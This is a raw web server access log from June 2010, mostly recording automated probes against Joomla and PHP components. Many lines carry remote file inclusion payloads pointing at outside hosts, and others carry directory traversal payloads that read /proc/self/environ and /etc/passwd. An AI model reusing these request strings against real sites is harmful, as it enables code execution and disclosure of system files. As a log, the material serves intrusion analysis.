67.30.129.57 - - [23/Jun/2010:05:40:37 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:40:37 -0400] "GET /logs/error_log.Q109090800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:40:37 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
66.194.249.108 - - [23/Jun/2010:05:41:05 -0400] "GET /errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.194.249.108 - - [23/Jun/2010:05:41:05 -0400] "GET /logs/error_log.Q109080600%20%20/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.194.249.108 - - [23/Jun/2010:05:41:05 -0400] "GET /logs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.15.152.183 - - [23/Jun/2010:05:41:35 -0400] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.65"
74.55.238.226 - - [23/Jun/2010:05:41:41 -0400] "GET /logs/access_log.Q110060700//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
82.194.70.248 - - [23/Jun/2010:05:41:56 -0400] "POST /logs/access_log.Q109110500%20%20/contact.php HTTP/1.1" 404 238 "-" "Casper Bot Search"
82.194.70.248 - - [23/Jun/2010:05:41:56 -0400] "POST /contact.php HTTP/1.1" 404 209 "-" "Casper Bot Search"
82.194.70.248 - - [23/Jun/2010:05:41:56 -0400] "POST /logs/contact.php HTTP/1.1" 404 214 "-" "Casper Bot Search"
82.194.70.248 - - [23/Jun/2010:05:41:57 -0400] "POST /logs/access_log.Q109110500%20%20/contact.php HTTP/1.1" 404 238 "-" "Casper Bot Search"
82.194.70.248 - - [23/Jun/2010:05:41:57 -0400] "POST /logs/contact.php HTTP/1.1" 404 214 "-" "Casper Bot Search"
82.194.70.248 - - [23/Jun/2010:05:41:57 -0400] "POST /contact.php HTTP/1.1" 404 209 "-" "Casper Bot Search"
95.108.245.251 - - [23/Jun/2010:05:41:25 -0400] "GET /logs/error_log.Q110060300 HTTP/1.1" 200 6075261 "-" "Yandex/1.01.001 (compatible; Win16; I)"
74.55.238.226 - - [23/Jun/2010:05:42:13 -0400] "GET /logs/access_log.Q110053100//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
72.35.80.52 - - [23/Jun/2010:05:42:28 -0400] "GET /errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.35.80.52 - - [23/Jun/2010:05:42:28 -0400] "GET /logs/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.35.80.52 - - [23/Jun/2010:05:42:28 -0400] "GET /logs/error_log.Q109080600%20%20/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.209 - - [23/Jun/2010:05:42:34 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521F12D40000BC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.97.226.230 - - [23/Jun/2010:05:42:37 -0400] "GET /logs/access_log.Q110060700//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
216.97.226.230 - - [23/Jun/2010:05:43:12 -0400] "GET /logs/access_log.Q110053100//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
74.55.238.226 - - [23/Jun/2010:05:43:31 -0400] "GET /logs/access_log.Q110052800//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
216.97.226.230 - - [23/Jun/2010:05:44:33 -0400] "GET /logs/access_log.Q110052800//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
220.181.7.123 - - [23/Jun/2010:05:45:24 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.55.238.226 - - [23/Jun/2010:05:45:37 -0400] "GET /logs/error_log.Q110053100//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.828"
74.55.238.226 - - [23/Jun/2010:05:45:55 -0400] "GET /logs/access_log.Q110061100//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
216.97.226.230 - - [23/Jun/2010:05:46:12 -0400] "GET /logs/error_log.Q110053100//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.833"
123.125.66.68 - - [23/Jun/2010:05:46:23 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.97.226.230 - - [23/Jun/2010:05:46:33 -0400] "GET /logs/access_log.Q110061100//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
67.15.152.183 - - [23/Jun/2010:05:48:00 -0400] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.65"
211.203.180.144 - - [23/Jun/2010:05:48:13 -0400] "GET //index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
67.15.152.183 - - [23/Jun/2010:05:48:25 -0400] "GET /logs/access_log.Q110052800//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:05:48:25 -0400] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:05:48:25 -0400] "GET /logs//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:05:48:30 -0400] "GET /logs/access_log.Q110053100//*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
95.108.245.251 - - [23/Jun/2010:05:48:46 -0400] "GET /logs/access_log.Q109122900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
64.27.19.114 - - [23/Jun/2010:05:48:49 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 286 "-" "libwww-perl/5.831"
64.27.19.114 - - [23/Jun/2010:05:48:49 -0400] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 259 "-" "libwww-perl/5.831"
64.27.19.114 - - [23/Jun/2010:05:48:49 -0400] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 264 "-" "libwww-perl/5.831"
200.202.243.41 - - [23/Jun/2010:05:49:13 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 286 "-" "libwww-perl/5.813"
200.202.243.41 - - [23/Jun/2010:05:49:13 -0400] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 259 "-" "libwww-perl/5.813"
200.202.243.41 - - [23/Jun/2010:05:49:14 -0400] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 264 "-" "libwww-perl/5.813"
211.203.180.144 - - [23/Jun/2010:05:50:00 -0400] "GET /logs/access_log.Q110042800//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.203.180.144 - - [23/Jun/2010:05:50:02 -0400] "GET //index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.203.180.144 - - [23/Jun/2010:05:50:03 -0400] "GET /logs//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.203.180.144 - - [23/Jun/2010:05:50:19 -0400] "GET /logs/error_log.Q110061100//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
74.55.238.226 - - [23/Jun/2010:05:50:33 -0400] "GET /logs/error_log.Q110060700//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.828"
67.195.114.223 - - [23/Jun/2010:05:50:27 -0400] "GET /logs/access_log.Q110040400 HTTP/1.0" 200 2504065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.209 - - [23/Jun/2010:05:50:54 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L02033C553C1439008690094+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.194.249.108 - - [23/Jun/2010:05:51:07 -0400] "GET /logs/error_log.Q109080600/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.97.226.230 - - [23/Jun/2010:05:51:33 -0400] "GET /logs/error_log.Q110060700//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.833"
189.108.172.26 - - [23/Jun/2010:05:52:07 -0400] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:52:07 -0400] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:52:12 -0400] "GET /logs/error_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:52:12 -0400] "GET /logs/access_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
66.249.71.209 - - [23/Jun/2010:05:52:21 -0400] "GET /logs/access_log.Q110052300 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
189.108.172.26 - - [23/Jun/2010:05:52:44 -0400] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:52:44 -0400] "GET /logs/access_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:52:47 -0400] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:52:51 -0400] "GET /logs/error_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:52:59 -0400] "GET /logs/access_log.Q110052800%20/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:53:17 -0400] "GET /logs/access_log.Q110052800%20/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:53:18 -0400] "GET /logs/access_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:53:20 -0400] "GET /logs/error_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:53:21 -0400] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:53:23 -0400] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
72.35.80.52 - - [23/Jun/2010:05:53:32 -0400] "GET /logs/error_log.Q109080600/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
64.27.19.114 - - [23/Jun/2010:05:53:57 -0400] "GET /?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
189.108.172.26 - - [23/Jun/2010:05:53:58 -0400] "GET /logs/access_log.Q110052800%20/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
58.120.226.47 - - [23/Jun/2010:05:54:07 -0400] "GET //include/bbs.lib.inc.php?site_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
58.120.226.47 - - [23/Jun/2010:05:54:07 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.120.226.47 - - [23/Jun/2010:05:54:08 -0400] "GET /logs/error_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.120.226.47 - - [23/Jun/2010:05:54:11 -0400] "GET /logs/access_log.Q109102100%20%20//include/bbs.lib.inc.php?site_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Jun/2010:05:54:23 -0400] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:54:23 -0400] "GET /logs/access_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:05:54:26 -0400] "GET /logs/error_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
112.222.241.42 - - [23/Jun/2010:05:54:36 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; Tablet PC 2.0)"
112.222.241.42 - - [23/Jun/2010:05:54:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; Tablet PC 2.0)"
112.222.241.42 - - [23/Jun/2010:05:54:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; Tablet PC 2.0)"
112.222.241.42 - - [23/Jun/2010:05:54:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; Tablet PC 2.0)"
189.108.172.26 - - [23/Jun/2010:05:54:39 -0400] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
67.30.129.57 - - [23/Jun/2010:05:54:51 -0400] "GET //components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:54:51 -0400] "GET /logs/error_log.Q109090800%20%20//components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:54:51 -0400] "GET /logs//components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Jun/2010:05:54:56 -0400] "GET /logs/access_log.Q110052800%20/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
95.108.245.251 - - [23/Jun/2010:05:55:28 -0400] "GET /logs/error_log.Q110012900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.30.129.57 - - [23/Jun/2010:05:55:50 -0400] "GET //components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:55:50 -0400] "GET /logs//components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:55:50 -0400] "GET /logs/error_log.Q109090800%20%20//components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:56:11 -0400] "GET /logs/error_log.Q109100600%20%20//components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:57:11 -0400] "GET /logs/error_log.Q109100600%20%20//components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
119.73.47.141 - - [23/Jun/2010:05:58:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4"
119.73.47.141 - - [23/Jun/2010:05:58:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4"
119.73.47.141 - - [23/Jun/2010:05:58:46 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4"
119.73.47.141 - - [23/Jun/2010:05:58:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4"
67.30.129.57 - - [23/Jun/2010:05:58:47 -0400] "GET /logs/error_log.Q109090800//components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.71.209 - - [23/Jun/2010:05:59:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L826887628B00C000E4A802C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.27.19.114 - - [23/Jun/2010:05:59:24 -0400] "GET /logs/access_log.Q110060900/?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
64.27.19.114 - - [23/Jun/2010:05:59:24 -0400] "GET /?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
64.27.19.114 - - [23/Jun/2010:05:59:24 -0400] "GET /logs/?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.831"
200.202.243.41 - - [23/Jun/2010:05:59:43 -0400] "GET /?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.813"
67.30.129.57 - - [23/Jun/2010:06:00:08 -0400] "GET /logs/error_log.Q109090800//components/com_mambelfish/mambelfish.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Jun/2010:06:01:04 -0400] "GET /logs/access_log.Q110061500%20//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:06:01:04 -0400] "GET //index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:06:01:05 -0400] "GET /logs/access_log.Q110061100%20//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:06:01:56 -0400] "GET //index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:06:01:59 -0400] "GET /logs/access_log.Q110061100%20//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
189.108.172.26 - - [23/Jun/2010:06:02:01 -0400] "GET /logs/access_log.Q110061500%20//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
95.108.245.251 - - [23/Jun/2010:06:02:09 -0400] "GET /logs/error_log.Q109123100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
64.27.19.114 - - [23/Jun/2010:06:02:10 -0400] "GET /logs/error_log.Q110050400/?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.831"
189.108.172.26 - - [23/Jun/2010:06:02:55 -0400] "GET /logs/access_log.Q110060700//index.php/web2?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
